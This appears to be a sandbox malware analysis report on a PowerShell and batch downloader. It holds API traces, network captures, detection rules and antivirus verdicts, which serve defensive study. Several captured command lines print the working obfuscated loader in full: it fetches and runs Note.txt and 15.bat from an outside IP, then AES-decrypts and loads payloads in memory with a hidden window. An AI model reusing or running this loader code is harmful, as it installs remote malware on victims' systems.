heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c81000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c82000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c83000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c84000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c85000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c86000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c87000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c88000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c89000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c8a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c8b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c8c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c8d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c8e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c8f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05040000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05041000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05042000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05043000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Roaming\15.bat
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function gkzChlFZJJ($CLgcLN, $kmBiXxhdPBBuVK){[IO.File]::WriteAllBytes($CLgcLN, $kmBiXxhdPBBuVK)};function EHyqZyfXS($CLgcLN){if($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68399,68407,68407))) -eq $True){rundll32.exe $CLgcLN }elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68411,68414,68348))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $CLgcLN}elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68408,68414,68404))) -eq $True){misexec /qn /i $CLgcLN}else{Start-Process $CLgcLN}};function EcjCVmfjLDzFvM($qDNhNUEOwgjE){$pXytQmYCtNpvKlmM = New-Object (wTbQxZaeCBFXfE @(68377,68400,68415,68345,68386,68400,68397,68366,68407,68404,68400,68409,68415));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kmBiXxhdPBBuVK = $pXytQmYCtNpvKlmM.DownloadData($qDNhNUEOwgjE);return $kmBiXxhdPBBuVK};function wTbQxZaeCBFXfE($IXRsdNnynXKLzp){$gCTQwIlSnN=68299;$gsScNSXbhsG=$Null;foreach($YPrbcjAFtcNCEhncu in $IXRsdNnynXKLzp){$gsScNSXbhsG+=[char]($YPrbcjAFtcNCEhncu-$gCTQwIlSnN)};return $gsScNSXbhsG};function odaqkEMluKlVzieGjH(){$nbpUYlNulSp = $env:AppData + '\';$cnysluAIEDXyIH = $nbpUYlNulSp + 'Note.txt';If(Test-Path -Path $cnysluAIEDXyIH){Invoke-Item $cnysluAIEDXyIH;}Else{ $nzWdArjtuUapYUy = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68377,68410,68415,68400,68345,68415,68419,68415));gkzChlFZJJ $cnysluAIEDXyIH $nzWdArjtuUapYUy;Invoke-Item $cnysluAIEDXyIH;};$iTWyAvaurQ = $nbpUYlNulSp + '15.bat'; if (Test-Path -Path $iTWyAvaurQ){EHyqZyfXS $iTWyAvaurQ;}Else{ $YiQQDI = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE 
@(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68348,68352,68345,68397,68396,68415));gkzChlFZJJ $iTWyAvaurQ $YiQQDI;EHyqZyfXS $iTWyAvaurQ;};;;;}odaqkEMluKlVzieGjH;
cmdline powershell.exe -ExecutionPolicy UnRestricted function gkzChlFZJJ($CLgcLN, $kmBiXxhdPBBuVK){[IO.File]::WriteAllBytes($CLgcLN, $kmBiXxhdPBBuVK)};function EHyqZyfXS($CLgcLN){if($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68399,68407,68407))) -eq $True){rundll32.exe $CLgcLN }elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68411,68414,68348))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $CLgcLN}elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68408,68414,68404))) -eq $True){misexec /qn /i $CLgcLN}else{Start-Process $CLgcLN}};function EcjCVmfjLDzFvM($qDNhNUEOwgjE){$pXytQmYCtNpvKlmM = New-Object (wTbQxZaeCBFXfE @(68377,68400,68415,68345,68386,68400,68397,68366,68407,68404,68400,68409,68415));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kmBiXxhdPBBuVK = $pXytQmYCtNpvKlmM.DownloadData($qDNhNUEOwgjE);return $kmBiXxhdPBBuVK};function wTbQxZaeCBFXfE($IXRsdNnynXKLzp){$gCTQwIlSnN=68299;$gsScNSXbhsG=$Null;foreach($YPrbcjAFtcNCEhncu in $IXRsdNnynXKLzp){$gsScNSXbhsG+=[char]($YPrbcjAFtcNCEhncu-$gCTQwIlSnN)};return $gsScNSXbhsG};function odaqkEMluKlVzieGjH(){$nbpUYlNulSp = $env:AppData + '\';$cnysluAIEDXyIH = $nbpUYlNulSp + 'Note.txt';If(Test-Path -Path $cnysluAIEDXyIH){Invoke-Item $cnysluAIEDXyIH;}Else{ $nzWdArjtuUapYUy = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68377,68410,68415,68400,68345,68415,68419,68415));gkzChlFZJJ $cnysluAIEDXyIH $nzWdArjtuUapYUy;Invoke-Item $cnysluAIEDXyIH;};$iTWyAvaurQ = $nbpUYlNulSp + '15.bat'; if (Test-Path -Path $iTWyAvaurQ){EHyqZyfXS $iTWyAvaurQ;}Else{ $YiQQDI = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68348,68352,68345,68397,68396,68415));gkzChlFZJJ $iTWyAvaurQ $YiQQDI;EHyqZyfXS 
$iTWyAvaurQ;};;;;}odaqkEMluKlVzieGjH;
cmdline C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Roaming\15.bat"
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\15.bat';$MMJz='GelYestClYesurlYesrenlYestlYesProlYesceslYesslYes'.Replace('lYes', ''),'ChFGxTanFGxTgFGxTeEFGxTxFGxTteFGxTnsFGxTiFGxToFGxTnFGxT'.Replace('FGxT', ''),'EleTQWBmeTQWBnTQWBtAtTQWB'.Replace('TQWB', ''),'CrAFGseAFGsaAFGstAFGseAFGsDecAFGsryAFGsptAFGsorAFGs'.Replace('AFGs', ''),'SRlYbpRlYblRlYbiRlYbtRlYb'.Replace('RlYb', ''),'DoaAnecooaAnmpoaAnresoaAnsoaAn'.Replace('oaAn', ''),'EnHILctrHILcyHILcPoHILcinHILctHILc'.Replace('HILc', ''),'CDYnropDYnryToDYnr'.Replace('DYnr', ''),'ReaOApIdLiOApInesOApI'.Replace('OApI', ''),'IndQRQvodQRQkedQRQ'.Replace('dQRQ', ''),'TratglInstglIfotglIrmtglIFitglInatglIlBltglIotglIctglIktglI'.Replace('tglI', ''),'MbkBwaibkBwnbkBwModbkBwulbkBwebkBw'.Replace('bkBw', ''),'FroXggooXggmBaoXggseoXgg64SoXggtroXggioXggngoXgg'.Replace('oXgg', ''),'Loajyrjdjyrj'.Replace('jyrj', '');powershell -w hidden;function FBejp($JKmLP){$UerdI=[System.Security.Cryptography.Aes]::Create();$UerdI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$UerdI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$UerdI.Key=[System.Convert]::($MMJz[12])('dVsAn8RIciGbSq5PEUSffnRQiEF7D6JhJ+MhQGAxpxA=');$UerdI.IV=[System.Convert]::($MMJz[12])('rrMf8DdSiOTkJYW5AhOOlg==');$ytGVg=$UerdI.($MMJz[3])();$FTQFX=$ytGVg.($MMJz[10])($JKmLP,0,$JKmLP.Length);$ytGVg.Dispose();$UerdI.Dispose();$FTQFX;}function mpyCC($JKmLP){$FjjxJ=New-Object System.IO.MemoryStream(,$JKmLP);$sySFb=New-Object System.IO.MemoryStream;$Rdfpf=New-Object System.IO.Compression.GZipStream($FjjxJ,[IO.Compression.CompressionMode]::($MMJz[5]));$Rdfpf.($MMJz[7])($sySFb);$Rdfpf.Dispose();$FjjxJ.Dispose();$sySFb.Dispose();$sySFb.ToArray();}$BklLD=[System.IO.File]::($MMJz[8])([Console]::Title);$oNBKh=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 5).Substring(2))));$HuDRY=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 
6).Substring(2))));[System.Reflection.Assembly]::($MMJz[13])([byte[]]$HuDRY).($MMJz[6]).($MMJz[9])($null,$null);[System.Reflection.Assembly]::($MMJz[13])([byte[]]$oNBKh).($MMJz[6]).($MMJz[9])($null,$null); "
cmdline C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell.exe
parameters: -ExecutionPolicy UnRestricted function gkzChlFZJJ($CLgcLN, $kmBiXxhdPBBuVK){[IO.File]::WriteAllBytes($CLgcLN, $kmBiXxhdPBBuVK)};function EHyqZyfXS($CLgcLN){if($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68399,68407,68407))) -eq $True){rundll32.exe $CLgcLN }elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68411,68414,68348))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $CLgcLN}elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68408,68414,68404))) -eq $True){misexec /qn /i $CLgcLN}else{Start-Process $CLgcLN}};function EcjCVmfjLDzFvM($qDNhNUEOwgjE){$pXytQmYCtNpvKlmM = New-Object (wTbQxZaeCBFXfE @(68377,68400,68415,68345,68386,68400,68397,68366,68407,68404,68400,68409,68415));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kmBiXxhdPBBuVK = $pXytQmYCtNpvKlmM.DownloadData($qDNhNUEOwgjE);return $kmBiXxhdPBBuVK};function wTbQxZaeCBFXfE($IXRsdNnynXKLzp){$gCTQwIlSnN=68299;$gsScNSXbhsG=$Null;foreach($YPrbcjAFtcNCEhncu in $IXRsdNnynXKLzp){$gsScNSXbhsG+=[char]($YPrbcjAFtcNCEhncu-$gCTQwIlSnN)};return $gsScNSXbhsG};function odaqkEMluKlVzieGjH(){$nbpUYlNulSp = $env:AppData + '\';$cnysluAIEDXyIH = $nbpUYlNulSp + 'Note.txt';If(Test-Path -Path $cnysluAIEDXyIH){Invoke-Item $cnysluAIEDXyIH;}Else{ $nzWdArjtuUapYUy = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68377,68410,68415,68400,68345,68415,68419,68415));gkzChlFZJJ $cnysluAIEDXyIH $nzWdArjtuUapYUy;Invoke-Item $cnysluAIEDXyIH;};$iTWyAvaurQ = $nbpUYlNulSp + '15.bat'; if (Test-Path -Path $iTWyAvaurQ){EHyqZyfXS $iTWyAvaurQ;}Else{ $YiQQDI = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68348,68352,68345,68397,68396,68415));gkzChlFZJJ $iTWyAvaurQ $YiQQDI;EHyqZyfXS 
$iTWyAvaurQ;};;;;}odaqkEMluKlVzieGjH;
filepath: powershell.exe
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef80000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received HTTP/1.1 200 OK
Data received Content-Length: 108 Content-Type: text/plain Connection:close 에볼루션배팅 게임이름 배팅내역 회차 시간 금액 결과 미지급금액 지급전금액
Data received Content-Length: 62382 Content-Type: application/octet-stream Connection:close @echo off set "gwAVRA=seWiBDht aWiBDhPiBWiBDh=1WiBDh &WiBDh&WiBDh sWiBDhtaWiBDhrt WiBDh"WiBDh" WiBDh/mWiBDhinWiBDh WiBDh" set "CMXyhD=&WiBDh& eWiBDhxiWiBDhtWiBDh" set "pEXfDe=noWiBDht WiBDhdeWiBDhfWiBDhiWiBDhneWiBDhd aWiBDhPWiBDhiBWiBDh if %pEXfDe:WiBDh=% (%gwAVRA:WiBDh=%%0 %CMXyhD:WiBDh=%) ::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
Data received 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
Data received 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
Data received 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
Data sent GET /Note.txt HTTP/1.1 Host: 193.222.96.128:7287 Connection: Keep-Alive
Data sent GET /15.bat HTTP/1.1 Host: 193.222.96.128:7287
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Create a windows service rule Create_Service
description Communications over RAW Socket rule Network_TCP_Socket
description Communication using DGA rule Network_DGA
description Match Windows Http API call rule Str_Win32_Http_API
description Take ScreenShot rule ScreenShot
description Escalate privileges rule Escalate_priviledges
description Steal credential rule local_credential_Steal
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Communications using DNS rule Network_DNS
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description File Downloader rule Network_Downloader
description Match Windows Inet API call rule Str_Win32_Internet_API
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description Communications over P2P network rule Network_P2P_Win
host 193.222.96.128
file C:\Users\test22\AppData\Roaming\Note.txt
file C:\Users\test22\AppData\Roaming\15.bat
Time & API Arguments Status Return Repeated

send

buffer: GET /Note.txt HTTP/1.1 Host: 193.222.96.128:7287 Connection: Keep-Alive
socket: 1432
sent: 77
1 77 0

send

buffer: GET /15.bat HTTP/1.1 Host: 193.222.96.128:7287
socket: 860
sent: 51
1 51 0
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\15.bat
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\Note.txt
parent_process powershell.exe martian_process "C:\Windows\system32\NOTEPAD.EXE" C:\Users\test22\AppData\Roaming\Note.txt
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Roaming\15.bat"
Process injection Process 2864 resumed a thread in remote process 2968
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000088
suspend_count: 0
process_identifier: 2968
1 0 0
option -executionpolicy unrestricted value Attempts to bypass execution policy
option -executionpolicy unrestricted value Attempts to bypass execution policy
option -w hidden value Attempts to execute command with a hidden window
Skyhigh HTA/Downloader.f
ALYac VB:Trojan.Valyria.7482
VIPRE VB:Trojan.Valyria.7482
Arcabit VB:Trojan.Valyria.D1D3A
ESET-NOD32 VBS/Agent.QVR
McAfee HTA/Downloader.f
Avast Script:SNH-gen [Drp]
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan-Downloader.Script.Generic
BitDefender VB:Trojan.Valyria.7482
NANO-Antivirus Trojan.Script.Downloader.jpdglv
MicroWorld-eScan VB:Trojan.Valyria.7482
Rising Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:RXmrIh5jYAI)
Emsisoft VB:Trojan.Valyria.7482 (B)
F-Secure Malware.VBS/Dldr.Agent.VPLT
FireEye VB:Trojan.Valyria.7482
Ikarus Trojan.VBS.Agent
Google Detected
Avira VBS/Dldr.Agent.VPLT
GData VB:Trojan.Valyria.7482
Varist VBS/Agent.AZC!Eldorado
MAX malware (ai score=86)
Fortinet VBS/Agent.BSD!tr
AVG Script:SNH-gen [Drp]
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Windows\System32\notepad.exe